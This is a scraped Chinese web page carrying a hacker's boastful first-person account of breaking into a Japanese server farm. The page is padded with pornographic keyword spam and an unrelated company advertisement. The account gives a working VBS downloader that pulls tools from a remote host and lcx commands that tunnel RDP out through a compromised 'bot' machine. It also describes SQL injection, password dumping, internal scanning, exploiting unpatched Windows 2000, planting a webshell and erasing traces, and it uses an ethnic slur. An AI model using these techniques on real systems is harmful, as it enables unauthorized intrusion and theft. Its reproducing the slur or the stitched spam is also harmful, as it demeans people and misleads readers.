日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側工具欄

新聞中心

這里有您想知道的互聯網營銷解決方案
實戰(zhàn)滲透日本服務器群

因為這一局,滲透獲取整個服務器群的權限,N臺服務器。所以寫篇文章小小虛榮下。

成都創(chuàng)新互聯公司主營烏蘇網站建設的網絡公司,主營網站建設方案,重慶APP開發(fā)公司,烏蘇h5微信平臺小程序開發(fā)搭建,烏蘇網站營銷推廣歡迎烏蘇等地區(qū)企業(yè)咨詢

開局:

入手點是一個注射點:sa,內網, 輕車熟路寫個vbs腳本,下好lcx,轉發(fā)端口。

以下是引用片段:
down.vbs
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
use: cscript down.vbs http://ip/lcx.exe lcx.exe               (路徑默認在system32下)

這個下載腳本可以重復使用,也不會暴露我存放工具的地址。(有些下載腳本把下載地址寫在里面,個人覺得不很好。)
由于本機連接日本網絡比較慢。連撥兩個VPN,再登上日本本土的一臺肉雞(我想這樣速度不會差了,ps:肉雞的作用體現出來了)。

加了用戶。在肉雞終端:lcx -listen 520 1982,目標機:lcx -slave myip 520 127.0.0.1 3389
ok,終端里填:127.0.0.1:1982 順利登陸。

中盤:

win2000系統(tǒng),mssql server
先抓個系統(tǒng)密碼,找下sql密碼。查看了下一些信息,并檢查是否還有同行的后門,清除之。
分析了下密碼:(數字+機器名+數字)
其他都是鳥語也看不太明白。載了幾個基本工具放個隱藏目錄。
ps:一般進去后總得收拾下,最好不要種馬。死得快,也易暴露。

這時候就盤算著怎么拿web的權限了。(分析網絡拓撲結構了)
先看下網上鄰居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明顯,都是數據庫服務器。
再往上一層,又發(fā)現一個工作組:
web-k.**.jp
c***oo_db
...
哎,還是數據庫服務器。
ipconfig /all
192.168.10.18 只有一個內網ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s掃下內網開80的機子,線程設置為20,講究精確度嘛。
很遺憾,結果出來的幾個機子都是數據庫服務器,上面并沒有網站。
我就納悶了,web服務器跑哪了呢?

收官:

翻了一陣子,仔細分析了網絡拓撲結構。最后讓我找到了:
192.168.1.1-255這段是web服務器群
接下來,用s果然掃出一片。再對應外網ip,挑選溢出的下手對象(192.168.1.19)(倭奴喜歡古董級的win2000,好多補丁都不全,好溢出)
很舒坦地日下來,然后載個webshell放到web目錄的偏僻角落。擦擦屁股走人。

ps:圖是我溢出另外一臺數據庫服務器時截下的

【編輯推薦】

  1. 中科紅旗Linux和日本NEC服務器密切合作
  2. 刀片服務器承載IPTV未來

新聞名稱:實戰(zhàn)滲透日本服務器群
新聞來源:http://www.5511xx.com/article/cosschj.html